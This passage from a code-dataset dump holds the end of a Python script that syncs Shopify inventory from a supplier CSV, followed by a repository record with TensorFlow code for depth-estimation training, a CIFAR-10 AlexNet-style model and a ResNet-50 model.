while i <= pages:\n url = 'https://rubysgardenboutique.myshopify.com/admin/variants.json?limit=250&page={}&fields=id,sku'.format(i)\n r = requests.get(url, auth=(api_key, password))\n json_data = r.json()\n d += json_data['variants']\n i = i + 1\n print (\"Script Log - Got products\")\n return d\n\n\ndef create_sku_to_id_mapping(website_data):\n sku_to_id_map = {}\n for web_item in website_data: # For each 'variant' on your shopify\n sku = web_item['sku'] # Get the sku\n sku_to_id_map[sku] = web_item['id'] # Add the item to the dictionary, with the sku as the key!\n return sku_to_id_map\n\n\n\ndef select_supplier(file_name):\n if clientId == 'cb':\n output = csv_cb(file_name)\n elif clientId == 'el':\n output = csv_el(file_name)\n elif clientId == 'wgf':\n output = csv_wgf(file_name)\n elif clientId == 'west':\n output = csv_west(file_name)\n return (output)\n\ndef csv_el(file_name):\n output = []\n hide = []\n not_in_store = []\n sku_col = 1\n quantity_col = 3\n finished_col = 5\n skips = 3\n stock = ['GOOD', 'LOW']\n # file_path = '/Users/SamSale/Desktop/csv_drop/{}'.format(file_name)\n with open(file_name) as f:\n for skip in range(skips):\n next(f)\n for csv_item in csv.reader(f): # For each item in the CSV\n if csv_item[quantity_col] in stock:\n converted_inv = 69\n elif csv_item[quantity_col] == 'OUT':\n converted_inv = 0\n sku_in_csv = csv_item[sku_col]\n if sku_in_csv in website_dict:\n id = 
website_dict[sku_in_csv] # Use the sku as the key to get our web item from the dictionary\n output.append({\"variant\":\n {'id': id, \"inventory_quantity\": converted_inv,\n 'inventory_management': 'shopify'}})\n if csv_item[quantity_col] == 'OUT' and csv_item[finished_col] == 'FINISHED':\n hide.append(sku_in_csv)\n print('DEBUG: SKU {} is now deleted from store. Status: finished'.format(csv_item[sku_col]))\n else:\n not_in_store.append(sku_in_csv)\n print (\"Script Log - Created LUT\")\n return output\n\n\ndef update_stock(output):\n count = 0\n for item in output:\n id = (item['variant']['id'])\n payload = json.dumps(item)\n url = 'https://rubysgardenboutique.myshopify.com/admin/variants/{}.json'.format(id)\n r = requests.put(url, data=payload, auth=(api_key, password), headers={\"Content-Type\": \"application/json\"})\n count += 1\n time.sleep(.100)\n if r.status_code != 200:\n print ('error! with', item['variant']['id'], r.status_code)\n get_sku = requests.get(url, auth=(api_key, password))\n sku_list = get_sku.json()\n skus = sku_list['variant']['sku']\n qty = sku_list['variant']['inventory_quantity']\n\n print (count, \"Items in total\")\n\n\ndef delete_source_csv(file_name):\n os.remove(file_name)\n fn = file_name.rsplit('/', 1)[-1]\n print (fn, 'was deleted.')\n\n\ninbox = connect_to_gmail()\nnewest_mail = download_csv(inbox)\nfile_name = get_file()\nclientId = 'el'\npages = get_number_of_pages()\nwebsite_data = get_all_products(pages)\nwebsite_dict = create_sku_to_id_mapping(website_data)\noutput = select_supplier(file_name)\nupdate_stock(output)\ndelete_source_csv(file_name)\n" } ]
1
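`stock_update.py` above pulls every variant from the store by first asking a count endpoint, deriving `ceil(count / 250)` pages, then requesting the pages one by one with HTTP basic auth. The same pagination idiom as a generic helper; the endpoint layout and the `'count'`/`'variants'` response keys simply mirror that script and should be treated as assumptions about the target API:

```python
import math
import requests

def fetch_all(base_url, auth, per_page=250):
    # e.g. base_url = 'https://shop.example.com/admin/variants' (placeholder)
    count = requests.get(base_url + '/count.json', auth=auth).json()['count']
    pages = math.ceil(count / per_page)
    items = []
    for page in range(1, pages + 1):
        r = requests.get('{}.json?limit={}&page={}'.format(base_url, per_page, page),
                         auth=auth)
        items += r.json()['variants']
    return items
```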
sjwhhhi/tensorflow
https://github.com/sjwhhhi/tensorflow
f6c66ce1a49554d15b5d7869dd4cd68f82aaeffe
1123d36424270df139e077319ec812ce775ebf32
bd411dbbc6d883ed890d6fc96eed30030d4b9ee6
refs/heads/master
2020-03-21T17:25:53.700381
2018-08-07T01:29:24
2018-08-07T01:29:24
138,831,421
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5492666959762573, "alphanum_fraction": 0.5684775710105896, "avg_line_length": 34.59558868408203, "blob_id": "967cda56b349cdcbe27bf7eb7b2a678f09b0685d", "content_id": "81199c30165f37b093b09e64974a7f0dfdcd2ad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4841, "license_type": "no_license", "max_line_length": 99, "num_lines": 136, "path": "/depth_train/train.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport models\nfrom data_process import BatchGenerator\nfrom PIL import Image\nimport numpy as np\n\nCSV_PATH = 'train_web.csv'\nRESTORE_MODEL = 'nyu_model/model.ckpt'\nSAVE_MODEL = 'train/model.ckpt'\nRESULT_DIR = 'result/'\nINITIAL_LR = 0.0001\nbatch_size = 8\nMAX_STEP = 500000\n\n\ndef berHuLoss(label, predict, invalid_depth):\n output_size = 128*160\n predict_all = tf.reshape(predict, [-1, output_size])\n depth_all = tf.reshape(label, [-1, output_size])\n pixel_mask = tf.reshape(invalid_depth, [-1, output_size])\n predict_valid = tf.multiply(predict_all, pixel_mask)\n label_valid = tf.multiply(depth_all, pixel_mask)\n abs_error = tf.abs(label_valid - predict_valid)\n c = 0.2 * tf.reduce_max(abs_error)\n berhuloss = tf.where(abs_error <= c,\n abs_error,\n (tf.square(abs_error) + tf.square(c))/(2*c))\n loss = tf.reduce_mean(berhuloss)\n tf.summary.scalar('berhu_loss', loss)\n return loss\n\ndef build_loss(scale2_op, depths, pixels_mask):\n output_size = 128*160\n predictions_all = tf.reshape(scale2_op, [-1, output_size])\n depths_all = tf.reshape(depths, [-1, output_size])\n pixels_mask = tf.reshape(pixels_mask, [-1, output_size])\n predictions_valid = tf.multiply(predictions_all, pixels_mask)\n target_valid = tf.multiply(depths_all, pixels_mask)\n d = tf.subtract(predictions_valid, target_valid)\n square_d = tf.square(d)\n sum_square_d = tf.reduce_sum(square_d, 1)\n sum_d = tf.reduce_sum(d, 1)\n sqare_sum_d = tf.square(sum_d)\n cost = tf.reduce_mean((sum_square_d / output_size) - 0.5 * (sqare_sum_d / pow(output_size,2) ))\n cost = tf.sqrt(cost)\n tf.summary.scalar('loss', cost)\n return cost\n\ndef learning_rate(global_step):\n lr = tf.train.exponential_decay(INITIAL_LR,\n global_step,\n 2000,\n 0.9,\n True)\n tf.summary.scalar('learning_rate', lr)\n return lr\n\ndef train():\n # load data\n batch_generator = BatchGenerator(batch_size=batch_size)\n image, depth, invalid_depth = batch_generator.csv_input(CSV_PATH)\n\n # network\n net = models.ResNet50UpProj({'data': image}, batch_size, 1, True)\n logits = net.get_output()\n\n # loss\n #loss = berHuLoss(depth, logits, invalid_depth)\n loss = build_loss(logits, depth, invalid_depth)\n\n # fine_tuning\n varlist_train = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n varlist_all = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n\n # learning_rate\n global_step = tf.train.get_or_create_global_step()\n lr = learning_rate(global_step)\n\n # opt\n optimizer = tf.train.AdamOptimizer(lr)\n opt = optimizer.minimize(loss, global_step=global_step, var_list=varlist_train[-98:])\n\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('logdir')\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n # Load the converted parameters\n print('Loading the model')\n saver = tf.train.Saver(var_list=varlist_all)\n saver.restore(sess, RESTORE_MODEL)\n\n #train\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess, coord)\n for i in 
range(MAX_STEP):\n i = sess.run([global_step])[0]\n _, l = sess.run([opt, loss])\n print('step = %d, loss = %f' % (i, l))\n if i % 10 == 0 and i != 0:\n summary = sess.run(merged)\n writer.add_summary(summary, i)\n if i % 200 == 0 and i != 0:\n _, l, output, gt, rgb = sess.run([opt, loss, logits, depth, image])\n saver.save(sess, SAVE_MODEL)\n\n #rgb\n img = Image.fromarray(np.uint8(rgb[0]))\n img.save(RESULT_DIR+str(i)+'rgb.png')\n #prediction\n dep = output[0].transpose(2, 0, 1)\n if np.max(dep) != 0:\n ra_depth = (dep / np.max(dep)) * 255.0\n else:\n ra_depth = dep * 255.0\n depth_pil = Image.fromarray(np.uint8(ra_depth[0]), mode=\"L\")\n depth_pil.save(RESULT_DIR+str(i)+'pred.png')\n #groundtruth\n ground = gt[0].transpose(2, 0, 1)\n if np.max(ground) != 0:\n ra_ground = (ground / np.max(ground)) * 255.0\n else:\n ra_ground = ground * 255.0\n depth_pil = Image.fromarray(np.uint8(ra_ground[0]), mode=\"L\")\n depth_pil.save(RESULT_DIR+str(i)+'gt.png')\n\n coord.request_stop()\n coord.join(threads)\n sess.close()\n\ndef main(argv=None):\n train()\n\nif __name__ == '__main__':\n tf.app.run()\n" }, { "alpha_fraction": 0.5893254280090332, "alphanum_fraction": 0.6085989475250244, "avg_line_length": 35.486488342285156, "blob_id": "82c6e92bbb6ff3e33e8b29661d550fd13a3ebdda", "content_id": "334fb8fee6ca3b23b5ce566b61a8095e691e78e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1349, "license_type": "no_license", "max_line_length": 95, "num_lines": 37, "path": "/depth_train/data_process.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\nINPUT_HEIGHT = 228\nINPUT_WIDTH = 304\nOUTPUT_HEIGHT = 128\nOUTPUT_WIDTH = 160\n\nclass BatchGenerator:\n def __init__(self, batch_size):\n self.batch_size = batch_size\n\n def csv_input(self, csv_file):\n filename_queue = tf.train.string_input_producer([csv_file], shuffle=True)\n reader = tf.TextLineReader()\n _, data_example = reader.read(filename_queue)\n image_examples, depth_targets = tf.decode_csv(data_example, [[\"path\"], [\"annotation\"]])\n #input\n jpg = tf.read_file(image_examples)\n image = tf.image.decode_jpeg(jpg, channels=3)\n image = tf.cast(image, tf.float32)\n #target\n png = tf.read_file(depth_targets)\n depth = tf.image.decode_png(png, channels=1)\n depth = tf.cast(depth, tf.float32)\n depth = tf.div(depth, [255.0])\n #resize\n image = tf.image.resize_images(image, (INPUT_HEIGHT, INPUT_WIDTH))\n depth = tf.image.resize_images(depth, (OUTPUT_HEIGHT, OUTPUT_WIDTH))\n #invalid depth\n invalid_depth = tf.sign(depth)\n images, depths, invalid_depths = tf.train.batch(\n [image, depth, invalid_depth],\n batch_size=self.batch_size,\n num_threads=4,\n capacity=50 + 3 * self.batch_size,\n )\n return images, depths, invalid_depths" }, { "alpha_fraction": 0.5544260740280151, "alphanum_fraction": 0.5836510062217712, "avg_line_length": 29.675325393676758, "blob_id": "81a6e7b96ea503855436135c7b24ff7eed058a92", "content_id": "0b66f92e92646ec9fbd5ed8f8fd08591ce336cbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2361, "license_type": "no_license", "max_line_length": 97, "num_lines": 77, "path": "/depth_train/evaluate.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import os, glob, cv2\nimport numpy as np\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\nimport models\n\ndef load_data(image_dir, image_shape, out_shape):\n fs = 
glob.glob(os.path.join(image_dir, '*.jpg'))\n x = np.zeros((len(fs),) + image_shape, dtype=np.float32)\n y = np.zeros((len(fs),) + out_shape, dtype=np.float32)\n for i in range(len(fs)):\n img = cv2.imread(fs[i])[:,:,::-1]\n img = img[12:-12,16:-16,:]\n img = cv2.resize(img, (image_shape[1], image_shape[0]))\n img = img.astype('float32')\n x[i] = img\n img = cv2.imread(fs[i][:-3]+'png')\n img = img[12:-12, 16:-16, 0]\n img = cv2.resize(img, (out_shape[1], out_shape[0]))\n img = img.astype('float32')\n y[i,:,:,0] = 0.01*img\n return x, y\n\ndef evaluate(model_data_path, image_path):\n # Default input size\n height = 240\n width = 320\n channels = 3\n output_height, output_width = height, width\n for i in range(5):\n output_height = np.ceil(output_height / 2)\n output_width = np.ceil(output_width / 2)\n output_height = int(16*output_height)\n output_width = int(16*output_width)\n\n # Create a placeholder for the input image\n input_node = tf.placeholder(tf.float32, shape=(None, height, width, channels))\n\n # Construct the network\n net = models.ResNet50UpProj({'data': input_node}, 1, 1, False)\n\n with tf.Session() as sess:\n # Load the converted parameters\n print('Loading the model')\n\n # Use to load from ckpt file\n saver = tf.train.Saver()\n saver.restore(sess, model_data_path)\n\n x, y = load_data(image_path, (height, width, channels), (output_height, output_width, 1))\n ypred = np.zeros(y.shape)\n\n rel = 0\n total_batch = x.shape[0]\n for i in range(total_batch):\n pred = sess.run(net.get_output(), feed_dict={input_node: x[i: (i + 1)]})\n ypred[i] = pred\n\n # Evalute the network\n rel = abs(y-ypred) / y\n rel = np.mean(rel)\n thresh = np.maximum((y/ypred), (ypred/y))\n acc = (thresh<1.25).mean()\n\n return rel, acc\n\ndef main():\n model_path = './NYU_FCRN_ckpt/model.ckpt'\n image_path = '../data'\n rel, acc = evaluate(model_path, image_path)\n print('rel: {0}, acc: {1}'.format(rel, acc))\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6567817330360413, "alphanum_fraction": 0.6747691035270691, "avg_line_length": 42.75531768798828, "blob_id": "3480d45249bc16d075dd09211896140915bd1bdf", "content_id": "64d9313bf563118977abf7bac7eea69f61cf3590", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4114, "license_type": "no_license", "max_line_length": 128, "num_lines": 94, "path": "/cifar10_Alexnet/cifar10_input.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import os\nimport tensorflow as tf\n\nimage_size = 24\nnum_class = 10\nnum_example_per_epoch_for_train = 50000\nnum_example_per_epoch_for_eval = 10000\n\ndef read_cifar10(filename_queue):\n class CIFAR10Record(object):\n pass\n result = CIFAR10Record()\n label_bytes = 1\n result.height = 32\n result.width = 32\n result.depth = 3\n image_bytes = result.height * result.width *result.depth\n record_bytes = label_bytes + image_bytes\n #reader\n reader = tf.FixedLengthRecordReader(record_bytes= record_bytes)\n result.key, value = reader.read(filename_queue)\n #convert string to uint8\n record_bytes = tf.decode_raw(value, tf.uint8)\n #first bytes represent the label, in int32\n result.label = tf.cast(tf.strided_slice(record_bytes, [0], [label_bytes]), tf.int32)\n #remaining bytes represent the image, from [depth*height*width] to [depth,height,width]\n depth_major = tf.reshape(\n tf.strided_slice(record_bytes, [label_bytes], [label_bytes + image_bytes]), [result.depth, result.height, result.width])\n #from [depth, height, width] to [height, 
width, depth]\n result.uint8image = tf.transpose(depth_major, [1, 2, 0])\n return result\n\ndef _generate_image_label_batch(image, label, min_queue_examples, batch_size, shuffle):\n num_preprocess_threads = 16\n if shuffle:\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size = batch_size,\n num_threads = num_preprocess_threads,\n capacity = min_queue_examples + 3 * batch_size,\n min_after_dequeue = min_queue_examples)\n else:\n images, label_batch = tf.train.batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size)\n\n return images, tf.reshape(label_batch, [batch_size])\n\ndef distorted_input(data_dir, batch_size):\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' %i)\n for i in range (1, 6)]\n filename_queue = tf.train.string_input_producer(filenames)\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n height = image_size\n width = image_size\n #preprocess for trainging\n #get [24,24] part in image\n distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n distorted_image = tf.image.random_flip_left_right(distorted_image)\n distorted_image = tf.image.random_brightness(distorted_image,max_delta = 63)\n distorted_image = tf.image.random_contrast(distorted_image, lower = 0.2, upper = 1.8)\n float_image = tf.image.per_image_standardization(distorted_image)\n #set shape for dataset\n float_image.set_shape([height, width, 3])\n read_input.label.set_shape([1])\n min_fraction_queue = 0.4\n min_queue_examples = int(num_example_per_epoch_for_train * min_fraction_queue)\n\n return _generate_image_label_batch(float_image, read_input.label, min_queue_examples, batch_size, shuffle = True)\n\ndef inputs(eval_data, data_dir, batch_size):\n if not eval_data:\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' %i)\n for i in range(1, 6)]\n num_example_per_epoch = num_example_per_epoch_for_train\n else:\n filenames = [os.path.join(data_dir, 'test_batch.bin')]\n num_example_per_epoch = num_example_per_epoch_for_eval\n\n filenames_queue = tf.train.string_input_producer(filenames)\n read_input = read_cifar10(filenames_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n height = image_size\n width = image_size\n reshaped_image = tf.image.resize_image_with_crop_or_pad(reshaped_image, height, width)\n float_image = tf.image.per_image_standardization(reshaped_image)\n float_image.set_shape([height, width, 3])\n read_input.label.set_shape([1])\n min_fraction_queue = 0.4\n min_queue_examples = int(num_example_per_epoch_for_train * min_fraction_queue)\n return _generate_image_label_batch(float_image, read_input.label, min_queue_examples, batch_size, shuffle = False)\n\n" }, { "alpha_fraction": 0.5726743936538696, "alphanum_fraction": 0.6159560680389404, "avg_line_length": 46.267173767089844, "blob_id": "371f2f05c8b7e23a4fbcf6a1805230f2fa63c3a9", "content_id": "1338e46abf6edbdd64bccdf7868d45fcc8a2714a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6192, "license_type": "no_license", "max_line_length": 102, "num_lines": 131, "path": "/cifar10_Alexnet/cifar10.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport cifar10_input\n\ndata_dir = 'data'\nlearing_rate = 0.1\nbatch_size = 128\nnum_example_per_epoch_for_train = 50000\nmoving_average_decay = 0.9999\nnum_epoch_per_decay = 350\nlearing_rate_decay = 
0.1\n\ndef distorted_inputs():\n images, labels = cifar10_input.distorted_input(data_dir=data_dir, batch_size = batch_size)\n return images, labels\n\ndef _variable_on_gpu(name, shape, initializer):\n with tf.device('/gpu:0'):\n dtype = tf.float32\n var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)\n return var\n\n\ndef _variable_with_weight_decay(name, shape, stddev, wd):\n dtype = tf.float32\n var = _variable_on_gpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))\n if wd is not None:\n weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')\n tf.add_to_collection('losses', weight_decay)\n return var\n\ndef inference(data, train = False):\n #conv1\n with tf.variable_scope('conv1') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [5,5,3,96], stddev = 5e-2, wd = None)\n conv = tf.nn.conv2d(data, kernel, [1,4,4,1], padding='SAME')\n bias = _variable_on_gpu('bias', [96], tf.constant_initializer(0.0))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv1 = tf.nn.relu(pre_activation, name =scope.name)\n pool1 = tf.nn.max_pool(conv1, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME', name = 'pool1')\n\n #conv2\n with tf.variable_scope('conv2') as scope:\n kernel = _variable_with_weight_decay('weights', shape=[5,5,96,256], stddev= 5e-2, wd=None)\n conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')\n bias = _variable_on_gpu('bias', [256], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv2 = tf.nn.relu(pre_activation, name = scope.name)\n pool2 = tf.nn.max_pool(conv2, ksize=[1,3,3,1], strides=[1,2,2,1], padding='VALID', name='pool2')\n\n #conv3\n with tf.variable_scope('conv3') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [3,3,256,384], stddev = 5e-2, wd=None)\n conv = tf.nn.conv2d(pool2, kernel, [1,1,1,1], padding='SAME')\n bias = _variable_on_gpu('bias', [384], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv3 = tf.nn.relu(pre_activation, name = scope.name)\n pool3 = tf.nn.max_pool(conv3, ksize=[1,3,3,1], strides=[1,2,2,1], padding= 'SAME', name='pool3')\n\n #conv4\n with tf.variable_scope('conv4') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [3,3,384,384], stddev = 5e-2, wd=None)\n conv = tf.nn.conv2d(pool3, kernel, [1,1,1,1], padding='SAME')\n bias = _variable_on_gpu('bias', [384], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv4 = tf.nn.relu(pre_activation, name = scope.name)\n pool4 = tf.nn.max_pool(conv4, ksize=[1,3,3,1], strides=[1,2,2,1], padding= 'SAME', name='pool4')\n\n #conv5\n with tf.variable_scope('conv5') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [3,3,384,256], stddev = 5e-2, wd=None)\n conv = tf.nn.conv2d(pool4, kernel, [1,1,1,1], padding='SAME')\n bias = _variable_on_gpu('bias', [256], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv5 = tf.nn.relu(pre_activation, name = scope.name)\n pool5 = tf.nn.max_pool(conv5, ksize=[1,3,3,1], strides=[1,2,2,1], padding= 'SAME', name='pool5')\n\n #fc\n with tf.variable_scope('fc1') as scope:\n reshape = tf.reshape(pool5, [data.get_shape().as_list()[0], -1])\n dim = reshape.get_shape()[1].value\n kernel = _variable_with_weight_decay('weights', shape = [dim, 384],\n stddev=0.04, wd=0.004)\n bias = _variable_on_gpu('bias', [384], tf.constant_initializer(0.1))\n fc1 = tf.nn.relu(tf.matmul(reshape, kernel)+bias, name=scope.name)\n if train == 
True:\n drop1 = tf.nn.dropout(fc1, keep_prob=0.5, name='dropout')\n else:\n drop1 = tf.nn.dropout(fc1, keep_prob = 1, name='dropout')\n #fc2\n with tf.variable_scope('fc2') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [384, 192],\n stddev=0.04, wd=0.004)\n bias = _variable_on_gpu('bias', [192], tf.constant_initializer(0.1))\n fc2 = tf.nn.relu(tf.matmul(drop1, kernel) + bias, name=scope.name)\n\n #softmax\n with tf.variable_scope('softmax_linear') as scope:\n kernel = _variable_with_weight_decay('weights', [192, 10],\n stddev=0.04, wd= None)\n bias = _variable_on_gpu('bias', [10], tf.constant_initializer(0.1))\n softmax_linear = tf.add(tf.matmul(fc2, kernel), bias, name=scope.name)\n softmax = tf.nn.softmax(softmax_linear, name='softmax')\n return softmax\n\ndef loss(logits, labels):\n labels = tf.cast(labels, tf.int64)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits, name='cross_entropy_per_example')\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n tf.add_to_collection('losses', cross_entropy_mean)\n tf.summary.scalar('losses', cross_entropy_mean)\n return tf.add_n(tf.get_collection('losses'), name='total_loss')\n\n\ndef accuracy(logits, labels):\n correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\n acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar('accuracy', acc)\n return acc\n\ndef train(loss, global_step):\n num_batch = num_example_per_epoch_for_train / batch_size\n decay_step = int(num_batch*num_epoch_per_decay)\n lr = tf.train.exponential_decay(learing_rate,\n global_step,\n decay_step,\n learing_rate_decay,\n staircase=True)\n tf.summary.scalar('learning_rate', lr)\n train_step = tf.train.AdamOptimizer(lr).minimize(loss=loss, global_step=global_step)\n return train_step\n" }, { "alpha_fraction": 0.5895346999168396, "alphanum_fraction": 0.6377191543579102, "avg_line_length": 45.42948532104492, "blob_id": "103b573ae5715a8a6e0fc915cc882aa99c6bb8a0", "content_id": "9cca9308640a548987b15ee182a3f69efeb6fa02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7243, "license_type": "no_license", "max_line_length": 113, "num_lines": 156, "path": "/resnet50/resnet.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport cifar10_input\n\ndata_dir = 'data'\nlearing_rate = 0.1\nbatch_size = 64\nnum_example_per_epoch_for_train = 50000\nmoving_average_decay = 0.9999\nnum_epoch_per_decay = 350\nlearing_rate_decay = 0.1\n\ndef distorted_inputs():\n images, labels = cifar10_input.distorted_input(data_dir=data_dir, batch_size = batch_size)\n return images, labels\n\ndef _get_variable(name, shape, initializer, wd):\n dtype = tf.float32\n if wd>0:\n regularizer = tf.contrib.layers.l2_regularizer(wd)\n else:\n regularizer = None\n return tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype, regularizer=regularizer)\n\ndef conv(x, ksize, filter_num, stride, padding = 'SAME'):\n filter_in = x.get_shape()[-1]\n shape = [ksize, ksize, filter_in, filter_num]\n weight = _get_variable('weights',\n shape=shape,\n initializer=tf.truncated_normal_initializer(stddev=0.1),\n wd=0.00004)\n return tf.nn.conv2d(x, weight, [1, stride, stride, 1], padding = padding)\n\ndef maxpool(x, ksize = 2, strides = 2, padding = 'SAME'):\n return tf.nn.max_pool(x, ksize = [1, ksize, ksize, 1], strides = [1, strides, strides, 1], padding = padding)\n\ndef avgpool(x, 
ksize = 2, strides = 2, padding = 'SAME'):\n return tf.nn.avg_pool(x, ksize = [1, ksize, ksize, 1], strides = [1, strides, strides, 1], padding = padding)\n\ndef fc(x, fc_out):\n fc_in = x.get_shape()[1]\n shape = [fc_in, fc_out]\n weight = _get_variable('weights',\n shape=shape,\n initializer=tf.truncated_normal_initializer(stddev=0.01),\n wd=0.00004)\n bias = _get_variable('bias',\n shape= [fc_out],\n initializer=tf.constant_initializer(0.0),\n wd = None)\n y = tf.nn.bias_add(tf.matmul(x, weight), bias)\n return y\n\ndef bn(x, is_training):\n shape = x.get_shape()\n pop_mean = tf.get_variable('mean', shape, initializer = tf.constant_initializer(0.0), trainable=False)\n pop_var = tf.get_variable('variance', shape, initializer=tf.constant_initializer(1.0), trainable=False)\n offset = tf.get_variable('beta', shape, initializer=tf.constant_initializer(0.0))\n scale = tf.get_variable('scale', shape, initializer=tf.constant_initializer(1.0))\n epsilon = 1e-4\n decay = 0.999\n\n if is_training:\n batch_mean, batch_var = tf.nn.moments(x, [0])\n train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n train_var = tf.assign(pop_var, pop_var * decay + batch_var * (1 - decay))\n with tf.control_dependencies([train_mean, train_var]):\n output = tf.nn.batch_normalization(x, batch_mean, batch_var, offset, scale, epsilon)\n else:\n output = tf.nn.batch_normalization(x, pop_mean, pop_var, offset, scale, epsilon)\n return output\n\ndef identity_block(input_layer, output_num, is_training = True):\n shortcut = input_layer\n conv1 = conv(input_layer, ksize=3, filter_num=output_num, stride=1, padding='SAME')\n bn1 = bn(conv1, is_training=is_training)\n relu1 = tf.nn.relu(bn1)\n conv2 = conv(relu1, ksize=3, filter_num=output_num, stride=1, padding='SAME')\n bn2 = bn(conv2, is_training=is_training)\n relu2 = tf.nn.relu(bn2)\n conv3 = conv(relu2, ksize=3, filter_num=output_num, stride=1, padding='SAME')\n bn3 = bn(conv3, is_training=is_training)\n output = shortcut + bn3\n output_act = tf.nn.relu(output)\n return output_act\n\n\ndef con_block(input_layer, output_num1, output_num2, output_num3, is_training = True):\n shortcut = input_layer\n conv1 = conv(input_layer, ksize=1, filter_num=output_num1, stride=1, padding='SAME')\n bn1 = bn(conv1, is_training=is_training)\n relu1 = tf.nn.relu(bn1)\n conv2 = conv(relu1, ksize=3, filter_num=output_num2, stride=1, padding='SAME')\n bn2 = bn(conv2, is_training=is_training)\n relu2 = tf.nn.relu(bn2)\n conv3 = conv(relu2, ksize=1, filter_num=output_num3, stride=1, padding='SAME')\n bn3 = bn(conv3, is_training=is_training)\n shortcut_conv = conv(shortcut, ksize=1, filter_num = output_num3, stride=1, padding='SAME')\n shortcut_bn = bn(shortcut_conv, is_training=is_training)\n output = shortcut_bn + bn3\n output_act = tf.nn.relu(output)\n return output_act\n\ndef inference(data, is_training = True):\n with tf.variable_scope('conv1'):\n conv_data = conv(data, ksize=7, filter_num=64, stride=1, padding='SAME')\n max1 = maxpool(conv_data, ksize=3, strides=2, padding='SAME')\n with tf.variable_scope('block1'):\n block1 = con_block(max1, 64, 64, 256, is_training=is_training)\n block2 = con_block(block1, 64, 64, 256, is_training=is_training)\n block3 = con_block(block2, 64, 64, 256,is_training=is_training)\n with tf.variable_scope('block2'):\n block4 = con_block(block3, 128, 128, 512, is_training=is_training)\n block5 = con_block(block4, 128, 128, 512, is_training=is_training)\n block6 = con_block(block5, 128, 128, 512, is_training=is_training)\n block7 = 
con_block(block6, 128, 128, 512, is_training=is_training)\n with tf.variable_scope('block3'):\n block8 = con_block(block7, 256, 256, 1024, is_training=is_training)\n block9 = con_block(block8, 256, 256, 1024, is_training=is_training)\n block10 = con_block(block9, 256, 256, 1024, is_training=is_training)\n block11 = con_block(block10, 256, 256, 1024, is_training=is_training)\n block12 = con_block(block11, 256, 256, 1024, is_training=is_training)\n block13 = con_block(block12, 256, 256, 1024, is_training=is_training)\n with tf.variable_scope('block4'):\n block14 = con_block(block13, 512, 512, 2048, is_training=is_training)\n block15 = con_block(block14, 512, 512, 2048, is_training=is_training)\n block16 = con_block(block15, 512, 512, 2048, is_training=is_training)\n avg = avgpool(block16, ksize=7, strides=2, padding='SAME')\n fc1 = fc(avg, 10)\n softmax = tf.nn.softmax(fc1, name= 'softmax')\n return softmax\n\ndef loss(logit, label):\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logit, label)\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n regularization_loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n losses = cross_entropy_mean + regularization_loss\n tf.summary.scalar('losses', losses)\n return losses\n\ndef accuracy(logits, labels):\n correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\n acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar('accuracy', acc)\n return 